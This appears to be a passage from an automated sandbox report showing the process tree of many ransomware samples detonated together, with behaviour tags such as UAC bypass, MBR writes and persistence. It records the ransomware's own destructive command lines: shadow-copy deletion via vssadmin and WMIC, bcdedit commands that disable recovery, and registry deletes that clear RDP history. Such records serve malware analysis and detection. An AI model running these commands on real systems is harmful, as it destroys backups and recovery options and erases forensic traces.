          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: MapViewOfSection
          PID:1988
          • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a.exe
            HEUR-Trojan-Ransom.Win32.Agent.gen-bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4084
        • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Blocker.gen-a741a3ffb090d88d5d11080ffe27d225542b2bad4863b846307385fe01359ec4.exe
          HEUR-Trojan-Ransom.Win32.Blocker.gen-a741a3ffb090d88d5d11080ffe27d225542b2bad4863b846307385fe01359ec4.exe
          2⤵
          • Executes dropped EXE
          • Writes to the Master Boot Record (MBR)
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2812
        • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Foreign.vho-ec05a4debfd9351bdbf1152ae6d77127aa3d2446a9be2b225e5fa876f4908c90.exe
          HEUR-Trojan-Ransom.Win32.Foreign.vho-ec05a4debfd9351bdbf1152ae6d77127aa3d2446a9be2b225e5fa876f4908c90.exe
          2⤵
          • UAC bypass
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • System policy modification
          PID:376
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 376
            3⤵
            • Program crash
            PID:4796
        • C:\Users\Admin\Desktop\00295\Trojan-Ransom.MSIL.Agent.gen-143af43e2ac557ae70d2bd508152614b1fc66bf15042c14c54b958ef89de53f1.exe
          Trojan-Ransom.MSIL.Agent.gen-143af43e2ac557ae70d2bd508152614b1fc66bf15042c14c54b958ef89de53f1.exe
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2440
        • C:\Users\Admin\Desktop\00295\Trojan-Ransom.MSIL.Agent.zl-5571432ff45e2249a78f042dcff636563940868b433e6b2bb1c641cf20af7c00.exe
          Trojan-Ransom.MSIL.Agent.zl-5571432ff45e2249a78f042dcff636563940868b433e6b2bb1c641cf20af7c00.exe
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
        • C:\Users\Admin\Desktop\00295\Trojan-Ransom.NSIS.Zerber.fc-bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56.exe
          Trojan-Ransom.NSIS.Zerber.fc-bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56.exe
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2472
          • C:\Users\Admin\Desktop\00295\Trojan-Ransom.NSIS.Zerber.fc-bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56.exe
            Trojan-Ransom.NSIS.Zerber.fc-bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56.exe
            3⤵
              PID:2228
          • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.iue-b663a92eba8d3728f954d1aec633e573f75f441149a01a1678801629c0c52d6a.exe
            Trojan-Ransom.Win32.Bitman.iue-b663a92eba8d3728f954d1aec633e573f75f441149a01a1678801629c0c52d6a.exe
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
            • C:\Users\Admin\AppData\Roaming\eutscwc.exe
              C:\Users\Admin\AppData\Roaming\eutscwc.exe
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • System policy modification
              PID:2760
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {current} bootems off
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:1584
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                4⤵
                • Interacts with shadow copies
                PID:1492
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {current} advancedoptions off
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:2332
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {current} optionsedit off
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:2592
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:3596
              • C:\Windows\system32\bcdedit.exe
                bcdedit.exe /set {current} recoveryenabled off
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:5020
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\help_recover_instructions.HTM
                4⤵
                  PID:4860
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4860 CREDAT:275457 /prefetch:2
                    5⤵
                      PID:5856
                  • C:\Windows\System32\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:2832
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Roaming\eutscwc.exe
                    4⤵
                      PID:6912
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TROJAN~4.EXE
                    3⤵
                      PID:2832
                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.jiv-9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3.exe
                    Trojan-Ransom.Win32.Bitman.jiv-9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3.exe
                    2⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of SetWindowsHookEx
                    PID:2492
                    • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.jiv-9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3.exe
                      Trojan-Ransom.Win32.Bitman.jiv-9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3.exe
                      3⤵
                        PID:3248
                        • C:\Windows\vvajfstlewem.exe
                          C:\Windows\vvajfstlewem.exe
                          4⤵
                            PID:4604
                            • C:\Windows\vvajfstlewem.exe
                              C:\Windows\vvajfstlewem.exe
                              5⤵
                                PID:936
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TRBCFD~1.EXE
                              4⤵
                                PID:4300
                          • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.jzg-99ffdcce064f60505e305c5b19694c41031d0d91c59c23a61ed20cf68cc3af65.exe
                            Trojan-Ransom.Win32.Bitman.jzg-99ffdcce064f60505e305c5b19694c41031d0d91c59c23a61ed20cf68cc3af65.exe
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of SetWindowsHookEx
                            PID:2268
                          • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.kdr-3eb005282668aeea30cbb9990cf27a796785829d887954fdc5e1f8497d781710.exe
                            Trojan-Ransom.Win32.Bitman.kdr-3eb005282668aeea30cbb9990cf27a796785829d887954fdc5e1f8497d781710.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2500
                            • C:\Windows\rcpdtjiivxat.exe
                              C:\Windows\rcpdtjiivxat.exe
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              • System policy modification
                              PID:348
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 376
                                4⤵
                                • Program crash
                                PID:3348
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TR146D~1.EXE
                              3⤵
                                PID:2432
                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.kmx-e25b2431aec847caed7f1b4f70d93e04ce4124adfd419c122bd50b84b4c3467e.exe
                              Trojan-Ransom.Win32.Bitman.kmx-e25b2431aec847caed7f1b4f70d93e04ce4124adfd419c122bd50b84b4c3467e.exe
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:1956
                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.qmf-53e13aa332a91eadf7c779cfba10ec1436da34b16a15b7636bcaa28526c11e5d.exe
                              Trojan-Ransom.Win32.Bitman.qmf-53e13aa332a91eadf7c779cfba10ec1436da34b16a15b7636bcaa28526c11e5d.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2056
                              • C:\Windows\tahldqhkfffs.exe
                                C:\Windows\tahldqhkfffs.exe
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                • System policy modification
                                PID:2876
                                • C:\Windows\System32\wbem\WMIC.exe
                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1752
                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
                                  4⤵
                                  • Opens file in notepad (likely ransom note)
                                  PID:3056
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM
                                  4⤵
                                    PID:5852
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5852 CREDAT:275457 /prefetch:2
                                      5⤵
                                        PID:1944
                                    • C:\Windows\System32\wbem\WMIC.exe
                                      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                      4⤵
                                        PID:1488
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\TAHLDQ~1.EXE
                                        4⤵
                                          PID:5660
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TR0168~1.EXE
                                        3⤵
                                          PID:1448
                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.qrz-62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31.exe
                                        Trojan-Ransom.Win32.Bitman.qrz-62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2348
                                        • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.qrz-62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31.exe
                                          Trojan-Ransom.Win32.Bitman.qrz-62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31.exe
                                          3⤵
                                            PID:3664
                                            • C:\Windows\tcfaucdqebng.exe
                                              C:\Windows\tcfaucdqebng.exe
                                              4⤵
                                                PID:1996
                                                • C:\Windows\tcfaucdqebng.exe
                                                  C:\Windows\tcfaucdqebng.exe
                                                  5⤵
                                                    PID:4956
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TR33FD~1.EXE
                                                  4⤵
                                                    PID:3340
                                              • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.rvk-198e4e9827b352efc07c4369ba5f3777110ba484da8fce52dd50bfdcda6d9b1a.exe
                                                Trojan-Ransom.Win32.Bitman.rvk-198e4e9827b352efc07c4369ba5f3777110ba484da8fce52dd50bfdcda6d9b1a.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2592
                                                • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.rvk-198e4e9827b352efc07c4369ba5f3777110ba484da8fce52dd50bfdcda6d9b1a.exe
                                                  Trojan-Ransom.Win32.Bitman.rvk-198e4e9827b352efc07c4369ba5f3777110ba484da8fce52dd50bfdcda6d9b1a.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3116
                                                  • C:\Windows\ecnrshqrsmui.exe
                                                    C:\Windows\ecnrshqrsmui.exe
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3792
                                                    • C:\Windows\ecnrshqrsmui.exe
                                                      C:\Windows\ecnrshqrsmui.exe
                                                      5⤵
                                                        PID:296
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TRD4A8~1.EXE
                                                      4⤵
                                                        PID:3048
                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Blocker.hrft-519aa934176f0a1302da49a57c341397536cda6d1337b75adc519d62ed809ca8.exe
                                                    Trojan-Ransom.Win32.Blocker.hrft-519aa934176f0a1302da49a57c341397536cda6d1337b75adc519d62ed809ca8.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    PID:2572
                                                    • C:\Users\Admin\AppData\Local\Temp\FB_A238.tmp.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\FB_A238.tmp.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Adds Run key to start application
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:912
                                                    • C:\Users\Admin\AppData\Local\Temp\FB_CE58.tmp.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\FB_CE58.tmp.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:2912
                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Blocker.keia-c9375b9ab33438292e04b729d7a9c4b509a5849b59f2947cf7fed419719ddb14.exe
                                                    Trojan-Ransom.Win32.Blocker.keia-c9375b9ab33438292e04b729d7a9c4b509a5849b59f2947cf7fed419719ddb14.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • NTFS ADS
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1852
                                                    • C:\Users\Admin\AppData\Roaming\logview32.exe
                                                      "C:\Users\Admin\AppData\Roaming\logview32.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1732
                                                      • C:\Users\Admin\AppData\Roaming\agfxdrv.exe
                                                        "C:\Users\Admin\AppData\Roaming\agfxdrv.exe"
                                                        4⤵
                                                          PID:4688
                                                        • C:\Users\Admin\AppData\Roaming\logview32.exe
                                                          C:\Users\Admin\AppData\Roaming\logview32.exe /control "" "0x000203DE"
                                                          4⤵
                                                            PID:6004
                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Crypmod.xbg-72f7bdd50add5bc7d64a67c0d2e974ef5dbaeef265955bf131903d8ffcef8f8b.exe
                                                        Trojan-Ransom.Win32.Crypmod.xbg-72f7bdd50add5bc7d64a67c0d2e974ef5dbaeef265955bf131903d8ffcef8f8b.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Windows directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2084
                                                        • C:\Windows\noagqygdmwuc.exe
                                                          C:\Windows\noagqygdmwuc.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Drops file in Program Files directory
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • System policy modification
                                                          PID:2164
                                                          • C:\Windows\System32\wbem\WMIC.exe
                                                            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                            4⤵
                                                              PID:832
                                                            • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                                              4⤵
                                                              • Opens file in notepad (likely ransom note)
                                                              PID:4984
                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                              "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
                                                              4⤵
                                                                PID:5032
                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:275457 /prefetch:2
                                                                  5⤵
                                                                    PID:4600
                                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:4207620 /prefetch:2
                                                                    5⤵
                                                                      PID:7856
                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:406545 /prefetch:2
                                                                      5⤵
                                                                        PID:6240
                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:406554 /prefetch:2
                                                                        5⤵
                                                                          PID:8136
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\NOAGQY~1.EXE
                                                                        4⤵
                                                                          PID:2020
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00295\TRC852~1.EXE
                                                                        3⤵
                                                                          PID:2628
                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Cryptor.ia-0ae95cf987e2d4261c0a33d570e675a374c4ee68ad392938cbbabf7e02d7938f.exe
                                                                        Trojan-Ransom.Win32.Cryptor.ia-0ae95cf987e2d4261c0a33d570e675a374c4ee68ad392938cbbabf7e02d7938f.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                        PID:2536
                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
                                                                          3⤵
                                                                            PID:2672
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
                                                                              4⤵
                                                                                PID:4020
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
                                                                                4⤵
                                                                                  PID:3824
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                  4⤵
                                                                                    PID:4044
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
                                                                                    4⤵
                                                                                      PID:3760
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                      4⤵
                                                                                        PID:316
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
                                                                                        4⤵
                                                                                          PID:3660
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                          4⤵
                                                                                            PID:1784
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
                                                                                            4⤵
                                                                                              PID:576
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                              4⤵
                                                                                                PID:3700
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
                                                                                                4⤵
                                                                                                  PID:3400
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                  4⤵
                                                                                                    PID:5608
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
                                                                                                    4⤵
                                                                                                      PID:920
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!#_READ_ME_#!.hta"
                                                                                                      4⤵
                                                                                                        PID:6036
                                                                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Foreign.flts-826812740aed4bd1d96f2781384208d6bf6a09605ba2b6df495441210b7be4f4.exe
                                                                                                    Trojan-Ransom.Win32.Foreign.flts-826812740aed4bd1d96f2781384208d6bf6a09605ba2b6df495441210b7be4f4.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:1908
                                                                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Foreign.nnkr-27f4e10c9166475a39ed3667bf5dc17c9735ae993c78d6f634f17c28ccbc405c.exe
                                                                                                    Trojan-Ransom.Win32.Foreign.nnkr-27f4e10c9166475a39ed3667bf5dc17c9735ae993c78d6f634f17c28ccbc405c.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                    PID:2208
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      3⤵
                                                                                                        PID:4552
                                                                                                    • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Locky.bil-a47bb8cf8a30e8058f5e7b5013c4c0d0506c25374ca33dcc78d5e57550e94dd0.exe
                                                                                                      Trojan-Ransom.Win32.Locky.bil-a47bb8cf8a30e8058f5e7b5013c4c0d0506c25374ca33dcc78d5e57550e94dd0.exe
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                      PID:1100
                                                                                                    • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Purgen.fa-31f476d527692946076f1c8919770e05176c742400ae2cf3991bd060c990df99.exe
                                                                                                      Trojan-Ransom.Win32.Purgen.fa-31f476d527692946076f1c8919770e05176c742400ae2cf3991bd060c990df99.exe
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops desktop.ini file(s)
                                                                                                      • Drops file in Program Files directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2612
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c C:\Users\Admin\AppData\Local\Temp\_9AF8.tmp.bat
                                                                                                        3⤵
                                                                                                          PID:1980
                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                          vssadmin.exe Delete Shadows /All /Quiet
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:2356
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c C:\Users\Admin\AppData\Local\Temp\_3ED6.tmp.bat
                                                                                                          3⤵
                                                                                                            PID:2564
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
                                                                                                              4⤵
                                                                                                              • Clears Network RDP Connection History and Configurations
                                                                                                              PID:2772
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
                                                                                                              4⤵
                                                                                                              • Clears Network RDP Connection History and Configurations
                                                                                                              PID:6264
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
                                                                                                              4⤵
                                                                                                                PID:6268
                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                attrib Default.rdp -s -h
                                                                                                                4⤵
                                                                                                                • Views/modifies file attributes
                                                                                                                PID:6324
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c C:\Users\Admin\AppData\Local\Temp\_3ED7.tmp.bat
                                                                                                              3⤵
                                                                                                                PID:2944
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Shade.nun-dde8e6a878cc08f186d0b1c7504ab15d1926cd09bcf6bd11b96cbb18f081e88b.exe
                                                                                                              Trojan-Ransom.Win32.Shade.nun-dde8e6a878cc08f186d0b1c7504ab15d1926cd09bcf6bd11b96cbb18f081e88b.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2088
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Shade.nvw-65a1384c903a76249080c4830535b6b744c2e14e650d483a601608f0174570c9.exe
                                                                                                              Trojan-Ransom.Win32.Shade.nvw-65a1384c903a76249080c4830535b6b744c2e14e650d483a601608f0174570c9.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:1216
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Shade.nwh-7f73794a4fa9ebfb3a45f2436a93dc0c293b71ce47eaeb7d8386318b6022fdf1.exe
                                                                                                              Trojan-Ransom.Win32.Shade.nwh-7f73794a4fa9ebfb3a45f2436a93dc0c293b71ce47eaeb7d8386318b6022fdf1.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:1248
